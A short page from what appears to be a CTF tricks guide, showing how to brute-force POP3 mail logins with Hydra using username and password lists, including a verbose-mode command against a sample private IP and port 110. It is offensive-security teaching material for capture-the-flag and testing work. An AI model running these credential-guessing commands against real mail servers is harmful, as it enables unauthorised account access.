> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-11/bruteforce/mail-service/trick-0119.md).

# Brute-Force POP3 Login

***

Brute-force POP3 logins using Hydra with username and password lists. Provide lists of potential usernames (`users.txt`) and passwords (`passwords.txt`).

```bash
hydra -L users.txt -P passwords.txt <target_ip> pop3
```

This executes Hydra, attempting all combinations from the specified files against the POP3 service on `<target_ip>`.

For more detailed output during the attack, you can use the `-vV` flag and specify the protocol and port explicitly:

```bash
hydra -L users.txt -P passwords.txt -vV pop3://192.168.1.10:110
```

The `-vV` option enables verbose mode, providing detailed output as the attack progresses.
